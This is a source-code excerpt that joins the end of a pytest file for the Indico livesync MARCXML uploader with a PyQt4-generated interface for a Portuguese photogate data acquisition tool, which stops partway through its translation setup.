    assert db_mock.session.commit.call_count == 1
def test_marcxml_run(mocker, db, dummy_event_new, dummy_agent):
    """The MARCXML uploader picks the right generator entry point."""
    mocker.patch('indico_livesync.uploader.db')
    mocker.patch.object(MARCXMLUploader, 'upload_xml', autospec=True)
    generator = mocker.patch('indico_livesync.uploader.MARCXMLGenerator')
    entry = LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_new=dummy_event_new,
                               agent=dummy_agent)
    db.session.add(entry)
    db.session.flush()
    uploader = MARCXMLUploader(MagicMock())
    # Queue runs must serialize via records_to_xml...
    uploader.run([entry])
    assert generator.records_to_xml.called
    assert not generator.objects_to_xml.called
    assert uploader.upload_xml.called
    generator.reset_mock()
    # ...while initial exports serialize via objects_to_xml.
    uploader.run_initial([1])
    assert not generator.records_to_xml.called
    assert generator.objects_to_xml.called
    assert uploader.upload_xml.called
def test_marcxml_empty_result(mocker):
    """No upload happens when MARCXML generation yields nothing."""
    mocker.patch.object(MARCXMLUploader, 'upload_xml', autospec=True)
    mocker.patch('indico_livesync.uploader.MARCXMLGenerator.objects_to_xml', return_value=None)
    uploader = MARCXMLUploader(MagicMock())
    uploader.run_initial([1])
    # An empty (None) XML payload must not be pushed to the server.
    assert not uploader.upload_xml.called
|
OmeGak/indico-plugins
|
livesync/tests/uploader_test.py
|
Python
|
gpl-3.0
| 6,150
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'User_interface.ui'
#
# Created: Tue May 16 10:33:40 2017
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # PyQt builds without QString (API v2 / Python 3) already use unicode
    # strings, so fall back to the identity function.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt versions dropped the encoding argument to translate().
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_PyQtGate(object):
def setupUi(self, PyQtGate):
PyQtGate.setObjectName(_fromUtf8("PyQtGate"))
PyQtGate.setWindowModality(QtCore.Qt.ApplicationModal)
PyQtGate.resize(862, 575)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(PyQtGate.sizePolicy().hasHeightForWidth())
PyQtGate.setSizePolicy(sizePolicy)
PyQtGate.setAcceptDrops(False)
PyQtGate.setAutoFillBackground(False)
PyQtGate.setModal(True)
self.tabPrincipal = QtGui.QTabWidget(PyQtGate)
self.tabPrincipal.setGeometry(QtCore.QRect(6, 7, 851, 561))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabPrincipal.sizePolicy().hasHeightForWidth())
self.tabPrincipal.setSizePolicy(sizePolicy)
self.tabPrincipal.setObjectName(_fromUtf8("tabPrincipal"))
self.tab_mostrador = QtGui.QWidget()
self.tab_mostrador.setObjectName(_fromUtf8("tab_mostrador"))
self.pB_startacq = QtGui.QPushButton(self.tab_mostrador)
self.pB_startacq.setGeometry(QtCore.QRect(520, 498, 141, 27))
self.pB_startacq.setObjectName(_fromUtf8("pB_startacq"))
self.l_mostrador = QtGui.QLabel(self.tab_mostrador)
self.l_mostrador.setGeometry(QtCore.QRect(110, 503, 111, 17))
self.l_mostrador.setObjectName(_fromUtf8("l_mostrador"))
self.label_7 = QtGui.QLabel(self.tab_mostrador)
self.label_7.setGeometry(QtCore.QRect(30, 503, 81, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.vS_channel_1 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_1.setGeometry(QtCore.QRect(758, 27, 29, 61))
self.vS_channel_1.setMaximum(1023)
self.vS_channel_1.setProperty("value", 512)
self.vS_channel_1.setTracking(True)
self.vS_channel_1.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_1.setObjectName(_fromUtf8("vS_channel_1"))
self.lE_channel_1 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_1.setGeometry(QtCore.QRect(788, 47, 41, 27))
self.lE_channel_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_1.setObjectName(_fromUtf8("lE_channel_1"))
self.vS_channel_2 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_2.setGeometry(QtCore.QRect(758, 107, 29, 61))
self.vS_channel_2.setMaximum(1023)
self.vS_channel_2.setProperty("value", 512)
self.vS_channel_2.setSliderPosition(512)
self.vS_channel_2.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_2.setObjectName(_fromUtf8("vS_channel_2"))
self.lE_channel_2 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_2.setGeometry(QtCore.QRect(788, 127, 41, 27))
self.lE_channel_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_2.setObjectName(_fromUtf8("lE_channel_2"))
self.lE_channel_5 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_5.setGeometry(QtCore.QRect(788, 367, 41, 27))
self.lE_channel_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_5.setObjectName(_fromUtf8("lE_channel_5"))
self.lE_channel_4 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_4.setGeometry(QtCore.QRect(788, 287, 41, 27))
self.lE_channel_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_4.setObjectName(_fromUtf8("lE_channel_4"))
self.lE_channel_3 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_3.setGeometry(QtCore.QRect(788, 207, 41, 27))
self.lE_channel_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_3.setObjectName(_fromUtf8("lE_channel_3"))
self.lE_channel_6 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_6.setGeometry(QtCore.QRect(788, 447, 41, 27))
self.lE_channel_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_6.setObjectName(_fromUtf8("lE_channel_6"))
self.vS_channel_4 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_4.setGeometry(QtCore.QRect(758, 267, 29, 61))
self.vS_channel_4.setMaximum(1023)
self.vS_channel_4.setProperty("value", 512)
self.vS_channel_4.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_4.setObjectName(_fromUtf8("vS_channel_4"))
self.vS_channel_3 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_3.setGeometry(QtCore.QRect(758, 187, 29, 61))
self.vS_channel_3.setMaximum(1023)
self.vS_channel_3.setProperty("value", 512)
self.vS_channel_3.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_3.setObjectName(_fromUtf8("vS_channel_3"))
self.vS_channel_5 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_5.setGeometry(QtCore.QRect(758, 347, 29, 61))
self.vS_channel_5.setMaximum(1023)
self.vS_channel_5.setProperty("value", 512)
self.vS_channel_5.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_5.setObjectName(_fromUtf8("vS_channel_5"))
self.vS_channel_6 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_6.setGeometry(QtCore.QRect(758, 427, 29, 61))
self.vS_channel_6.setMaximum(1023)
self.vS_channel_6.setProperty("value", 512)
self.vS_channel_6.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_6.setObjectName(_fromUtf8("vS_channel_6"))
self.tab_views = QtGui.QTabWidget(self.tab_mostrador)
self.tab_views.setGeometry(QtCore.QRect(2, 3, 751, 491))
self.tab_views.setTabPosition(QtGui.QTabWidget.West)
self.tab_views.setObjectName(_fromUtf8("tab_views"))
self.tab_separados = QtGui.QWidget()
self.tab_separados.setObjectName(_fromUtf8("tab_separados"))
self.pW_channel_5 = PlotWidget(self.tab_separados)
self.pW_channel_5.setGeometry(QtCore.QRect(8, 349, 701, 51))
self.pW_channel_5.setObjectName(_fromUtf8("pW_channel_5"))
self.pW_channel_3 = PlotWidget(self.tab_separados)
self.pW_channel_3.setGeometry(QtCore.QRect(8, 189, 701, 51))
self.pW_channel_3.setObjectName(_fromUtf8("pW_channel_3"))
self.sP_channel_4 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_4.setGeometry(QtCore.QRect(78, 246, 61, 21))
self.sP_channel_4.setMinimum(1)
self.sP_channel_4.setObjectName(_fromUtf8("sP_channel_4"))
self.lE_time_1 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_1.setGeometry(QtCore.QRect(148, 5, 81, 21))
self.lE_time_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_1.setObjectName(_fromUtf8("lE_time_1"))
self.sP_channel_2 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_2.setGeometry(QtCore.QRect(79, 86, 61, 21))
self.sP_channel_2.setMinimum(1)
self.sP_channel_2.setObjectName(_fromUtf8("sP_channel_2"))
self.lE_time_5 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_5.setGeometry(QtCore.QRect(148, 325, 81, 21))
self.lE_time_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_5.setObjectName(_fromUtf8("lE_time_5"))
self.cB_subida_4 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_4.setGeometry(QtCore.QRect(313, 246, 100, 22))
self.cB_subida_4.setChecked(True)
self.cB_subida_4.setObjectName(_fromUtf8("cB_subida_4"))
self.pW_channel_4 = PlotWidget(self.tab_separados)
self.pW_channel_4.setGeometry(QtCore.QRect(8, 269, 701, 51))
self.pW_channel_4.setObjectName(_fromUtf8("pW_channel_4"))
self.cB_descida_2 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_2.setGeometry(QtCore.QRect(408, 86, 100, 22))
self.cB_descida_2.setObjectName(_fromUtf8("cB_descida_2"))
self.l_channel_8 = QtGui.QLabel(self.tab_separados)
self.l_channel_8.setGeometry(QtCore.QRect(232, 90, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_8.setFont(font)
self.l_channel_8.setObjectName(_fromUtf8("l_channel_8"))
self.sP_channel_3 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_3.setGeometry(QtCore.QRect(79, 166, 61, 21))
self.sP_channel_3.setMinimum(1)
self.sP_channel_3.setObjectName(_fromUtf8("sP_channel_3"))
self.l_channel_12 = QtGui.QLabel(self.tab_separados)
self.l_channel_12.setGeometry(QtCore.QRect(232, 410, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_12.setFont(font)
self.l_channel_12.setObjectName(_fromUtf8("l_channel_12"))
self.l_channel_9 = QtGui.QLabel(self.tab_separados)
self.l_channel_9.setGeometry(QtCore.QRect(232, 170, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_9.setFont(font)
self.l_channel_9.setObjectName(_fromUtf8("l_channel_9"))
self.cB_subida_1 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_1.setGeometry(QtCore.QRect(312, 6, 97, 22))
self.cB_subida_1.setChecked(True)
self.cB_subida_1.setObjectName(_fromUtf8("cB_subida_1"))
self.l_channel_10 = QtGui.QLabel(self.tab_separados)
self.l_channel_10.setGeometry(QtCore.QRect(232, 250, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_10.setFont(font)
self.l_channel_10.setObjectName(_fromUtf8("l_channel_10"))
self.lE_time_3 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_3.setGeometry(QtCore.QRect(149, 165, 81, 21))
self.lE_time_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_3.setObjectName(_fromUtf8("lE_time_3"))
self.pW_channel_2 = PlotWidget(self.tab_separados)
self.pW_channel_2.setGeometry(QtCore.QRect(8, 109, 701, 51))
self.pW_channel_2.setObjectName(_fromUtf8("pW_channel_2"))
self.cB_descida_5 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_5.setGeometry(QtCore.QRect(408, 325, 100, 22))
self.cB_descida_5.setObjectName(_fromUtf8("cB_descida_5"))
self.l_channel_11 = QtGui.QLabel(self.tab_separados)
self.l_channel_11.setGeometry(QtCore.QRect(232, 330, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_11.setFont(font)
self.l_channel_11.setObjectName(_fromUtf8("l_channel_11"))
self.cB_descida_6 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_6.setGeometry(QtCore.QRect(408, 405, 100, 22))
self.cB_descida_6.setObjectName(_fromUtf8("cB_descida_6"))
self.cB_subida_3 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_3.setGeometry(QtCore.QRect(313, 165, 100, 22))
self.cB_subida_3.setChecked(True)
self.cB_subida_3.setObjectName(_fromUtf8("cB_subida_3"))
self.sP_channel_5 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_5.setGeometry(QtCore.QRect(78, 326, 61, 21))
self.sP_channel_5.setMinimum(1)
self.sP_channel_5.setObjectName(_fromUtf8("sP_channel_5"))
self.sP_channel_6 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_6.setGeometry(QtCore.QRect(78, 406, 61, 21))
self.sP_channel_6.setMinimum(1)
self.sP_channel_6.setObjectName(_fromUtf8("sP_channel_6"))
self.cB_subida_2 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_2.setGeometry(QtCore.QRect(313, 86, 100, 22))
self.cB_subida_2.setChecked(True)
self.cB_subida_2.setObjectName(_fromUtf8("cB_subida_2"))
self.sP_channel_1 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_1.setGeometry(QtCore.QRect(78, 6, 61, 21))
self.sP_channel_1.setMinimum(1)
self.sP_channel_1.setObjectName(_fromUtf8("sP_channel_1"))
self.cB_descida_4 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_4.setGeometry(QtCore.QRect(408, 246, 100, 22))
self.cB_descida_4.setObjectName(_fromUtf8("cB_descida_4"))
self.cB_subida_5 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_5.setGeometry(QtCore.QRect(313, 325, 100, 22))
self.cB_subida_5.setChecked(True)
self.cB_subida_5.setObjectName(_fromUtf8("cB_subida_5"))
self.pW_channel_6 = PlotWidget(self.tab_separados)
self.pW_channel_6.setGeometry(QtCore.QRect(8, 429, 701, 51))
self.pW_channel_6.setObjectName(_fromUtf8("pW_channel_6"))
self.cB_descida_3 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_3.setGeometry(QtCore.QRect(408, 165, 100, 22))
self.cB_descida_3.setObjectName(_fromUtf8("cB_descida_3"))
self.cB_subida_6 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_6.setGeometry(QtCore.QRect(313, 405, 100, 22))
self.cB_subida_6.setChecked(True)
self.cB_subida_6.setObjectName(_fromUtf8("cB_subida_6"))
self.l_channel_7 = QtGui.QLabel(self.tab_separados)
self.l_channel_7.setGeometry(QtCore.QRect(231, 10, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_7.setFont(font)
self.l_channel_7.setObjectName(_fromUtf8("l_channel_7"))
self.lE_time_6 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_6.setGeometry(QtCore.QRect(148, 405, 81, 21))
self.lE_time_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_6.setObjectName(_fromUtf8("lE_time_6"))
self.lE_time_2 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_2.setGeometry(QtCore.QRect(149, 85, 81, 21))
self.lE_time_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_2.setObjectName(_fromUtf8("lE_time_2"))
self.cB_descida_1 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_1.setGeometry(QtCore.QRect(407, 6, 97, 22))
self.cB_descida_1.setObjectName(_fromUtf8("cB_descida_1"))
self.lE_time_4 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_4.setGeometry(QtCore.QRect(148, 245, 81, 21))
self.lE_time_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_4.setObjectName(_fromUtf8("lE_time_4"))
self.pW_channel_1 = PlotWidget(self.tab_separados)
self.pW_channel_1.setGeometry(QtCore.QRect(8, 29, 701, 51))
self.pW_channel_1.setObjectName(_fromUtf8("pW_channel_1"))
self.tab_views.addTab(self.tab_separados, _fromUtf8(""))
self.tab_juntos = QtGui.QWidget()
self.tab_juntos.setObjectName(_fromUtf8("tab_juntos"))
self.pW_all = PlotWidget(self.tab_juntos)
self.pW_all.setGeometry(QtCore.QRect(9, 7, 701, 341))
self.pW_all.setObjectName(_fromUtf8("pW_all"))
self.tW_timetable = QtGui.QTableWidget(self.tab_juntos)
self.tW_timetable.setGeometry(QtCore.QRect(182, 357, 528, 111))
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(True)
font.setWeight(75)
self.tW_timetable.setFont(font)
self.tW_timetable.setObjectName(_fromUtf8("tW_timetable"))
self.tW_timetable.setColumnCount(0)
self.tW_timetable.setRowCount(0)
self.tW_timetable.horizontalHeader().setDefaultSectionSize(85)
self.tW_timetable.verticalHeader().setDefaultSectionSize(20)
self.pB_timetable = QtGui.QPushButton(self.tab_juntos)
self.pB_timetable.setGeometry(QtCore.QRect(40, 410, 111, 27))
self.pB_timetable.setObjectName(_fromUtf8("pB_timetable"))
self.tab_views.addTab(self.tab_juntos, _fromUtf8(""))
self.cB_constrain = QtGui.QCheckBox(self.tab_mostrador)
self.cB_constrain.setGeometry(QtCore.QRect(690, 501, 151, 22))
self.cB_constrain.setStyleSheet(_fromUtf8("color: rgb(0, 0, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_constrain.setObjectName(_fromUtf8("cB_constrain"))
self.cB_channel_1 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_1.setGeometry(QtCore.QRect(762, 9, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_1.setFont(font)
self.cB_channel_1.setStyleSheet(_fromUtf8("color: rgb(0, 0, 255);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_1.setChecked(True)
self.cB_channel_1.setObjectName(_fromUtf8("cB_channel_1"))
self.cB_channel_2 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_2.setGeometry(QtCore.QRect(762, 90, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_2.setFont(font)
self.cB_channel_2.setStyleSheet(_fromUtf8("color: rgb(0, 255, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_2.setChecked(True)
self.cB_channel_2.setObjectName(_fromUtf8("cB_channel_2"))
self.cB_channel_3 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_3.setGeometry(QtCore.QRect(762, 170, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_3.setFont(font)
self.cB_channel_3.setStyleSheet(_fromUtf8("color: rgb(255, 0, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_3.setChecked(True)
self.cB_channel_3.setObjectName(_fromUtf8("cB_channel_3"))
self.cB_channel_4 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_4.setGeometry(QtCore.QRect(762, 250, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_4.setFont(font)
self.cB_channel_4.setStyleSheet(_fromUtf8("color: rgb(0, 128, 128);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_4.setChecked(True)
self.cB_channel_4.setObjectName(_fromUtf8("cB_channel_4"))
self.cB_channel_5 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_5.setGeometry(QtCore.QRect(762, 330, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_5.setFont(font)
self.cB_channel_5.setStyleSheet(_fromUtf8("color: rgb(128, 128, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_5.setChecked(True)
self.cB_channel_5.setObjectName(_fromUtf8("cB_channel_5"))
self.cB_channel_6 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_6.setGeometry(QtCore.QRect(762, 410, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_6.setFont(font)
self.cB_channel_6.setStyleSheet(_fromUtf8("color: rgb(128, 0, 128);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_6.setChecked(True)
self.cB_channel_6.setObjectName(_fromUtf8("cB_channel_6"))
self.label_8 = QtGui.QLabel(self.tab_mostrador)
self.label_8.setGeometry(QtCore.QRect(334, 504, 51, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_8.setFont(font)
self.label_8.setObjectName(_fromUtf8("label_8"))
self.lE_delay = QtGui.QLineEdit(self.tab_mostrador)
self.lE_delay.setGeometry(QtCore.QRect(394, 502, 61, 21))
self.lE_delay.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_delay.setObjectName(_fromUtf8("lE_delay"))
self.label_9 = QtGui.QLabel(self.tab_mostrador)
self.label_9.setGeometry(QtCore.QRect(460, 504, 21, 17))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.label_9.setFont(font)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.tabPrincipal.addTab(self.tab_mostrador, _fromUtf8(""))
self.tab_arquivo = QtGui.QWidget()
self.tab_arquivo.setObjectName(_fromUtf8("tab_arquivo"))
self.pB_save = QtGui.QPushButton(self.tab_arquivo)
self.pB_save.setGeometry(QtCore.QRect(80, 70, 181, 27))
self.pB_save.setObjectName(_fromUtf8("pB_save"))
self.pB_load = QtGui.QPushButton(self.tab_arquivo)
self.pB_load.setGeometry(QtCore.QRect(80, 110, 181, 27))
self.pB_load.setObjectName(_fromUtf8("pB_load"))
self.pB_savetime = QtGui.QPushButton(self.tab_arquivo)
self.pB_savetime.setGeometry(QtCore.QRect(310, 70, 181, 27))
self.pB_savetime.setObjectName(_fromUtf8("pB_savetime"))
self.tabPrincipal.addTab(self.tab_arquivo, _fromUtf8(""))
self.tab_serial = QtGui.QWidget()
self.tab_serial.setObjectName(_fromUtf8("tab_serial"))
self.pB_connect = QtGui.QPushButton(self.tab_serial)
self.pB_connect.setGeometry(QtCore.QRect(70, 90, 261, 27))
self.pB_connect.setObjectName(_fromUtf8("pB_connect"))
self.label_2 = QtGui.QLabel(self.tab_serial)
self.label_2.setGeometry(QtCore.QRect(70, 40, 311, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.pB_closeconnection = QtGui.QPushButton(self.tab_serial)
self.pB_closeconnection.setGeometry(QtCore.QRect(70, 210, 98, 27))
self.pB_closeconnection.setObjectName(_fromUtf8("pB_closeconnection"))
self.layoutWidget = QtGui.QWidget(self.tab_serial)
self.layoutWidget.setGeometry(QtCore.QRect(71, 141, 231, 29))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.layoutWidget)
self.horizontalLayout_2.setMargin(0)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label = QtGui.QLabel(self.layoutWidget)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_2.addWidget(self.label)
self.cB_port = QtGui.QComboBox(self.layoutWidget)
self.cB_port.setObjectName(_fromUtf8("cB_port"))
self.horizontalLayout_2.addWidget(self.cB_port)
self.label_25 = QtGui.QLabel(self.tab_serial)
self.label_25.setGeometry(QtCore.QRect(70, 270, 101, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_25.setFont(font)
self.label_25.setObjectName(_fromUtf8("label_25"))
self.l_commstatus = QtGui.QLabel(self.tab_serial)
self.l_commstatus.setGeometry(QtCore.QRect(180, 270, 491, 17))
self.l_commstatus.setObjectName(_fromUtf8("l_commstatus"))
self.tabPrincipal.addTab(self.tab_serial, _fromUtf8(""))
self.tab_sobre = QtGui.QWidget()
self.tab_sobre.setObjectName(_fromUtf8("tab_sobre"))
self.l_ufscar = QtGui.QLabel(self.tab_sobre)
self.l_ufscar.setGeometry(QtCore.QRect(160, 370, 180, 125))
self.l_ufscar.setObjectName(_fromUtf8("l_ufscar"))
self.l_cca = QtGui.QLabel(self.tab_sobre)
self.l_cca.setGeometry(QtCore.QRect(567, 368, 130, 122))
self.l_cca.setObjectName(_fromUtf8("l_cca"))
self.label_3 = QtGui.QLabel(self.tab_sobre)
self.label_3.setGeometry(QtCore.QRect(530, 497, 211, 17))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial Black"))
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.textBrowser = QtGui.QTextBrowser(self.tab_sobre)
self.textBrowser.setGeometry(QtCore.QRect(80, 40, 681, 321))
self.textBrowser.setObjectName(_fromUtf8("textBrowser"))
self.tabPrincipal.addTab(self.tab_sobre, _fromUtf8(""))
self.l_filename = QtGui.QLabel(PyQtGate)
self.l_filename.setGeometry(QtCore.QRect(290, 12, 561, 17))
self.l_filename.setObjectName(_fromUtf8("l_filename"))
self.retranslateUi(PyQtGate)
self.tabPrincipal.setCurrentIndex(0)
self.tab_views.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(PyQtGate)
def retranslateUi(self, PyQtGate):
PyQtGate.setWindowTitle(_translate("PyQtGate", "PyQtGate", None))
self.tab_mostrador.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Mostrar dados de aquisição</p></body></html>", None))
self.pB_startacq.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Inicia e interrompe a aquisição de sinal do Photogate</p></body></html>", None))
self.pB_startacq.setText(_translate("PyQtGate", "Iniciar", None))
self.l_mostrador.setText(_translate("PyQtGate", "parada", None))
self.label_7.setText(_translate("PyQtGate", "Aquisição:", None))
self.vS_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 1</p></body></html>", None))
self.lE_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 1</p></body></html>", None))
self.lE_channel_1.setText(_translate("PyQtGate", "512", None))
self.vS_channel_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 2</p></body></html>", None))
self.lE_channel_2.setText(_translate("PyQtGate", "512", None))
self.lE_channel_5.setText(_translate("PyQtGate", "512", None))
self.lE_channel_4.setText(_translate("PyQtGate", "512", None))
self.lE_channel_3.setText(_translate("PyQtGate", "512", None))
self.lE_channel_6.setText(_translate("PyQtGate", "512", None))
self.vS_channel_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 4</p></body></html>", None))
self.vS_channel_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 3</p></body></html>", None))
self.vS_channel_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 5</p></body></html>", None))
self.vS_channel_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 6</p></body></html>", None))
self.sP_channel_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.lE_time_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_1.setText(_translate("PyQtGate", "0", None))
self.sP_channel_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.lE_time_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_5.setText(_translate("PyQtGate", "0", None))
self.cB_subida_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_4.setText(_translate("PyQtGate", "Subida", None))
self.cB_descida_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_2.setText(_translate("PyQtGate", "Descida", None))
self.l_channel_8.setText(_translate("PyQtGate", "segundos", None))
self.sP_channel_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.l_channel_12.setText(_translate("PyQtGate", "segundos", None))
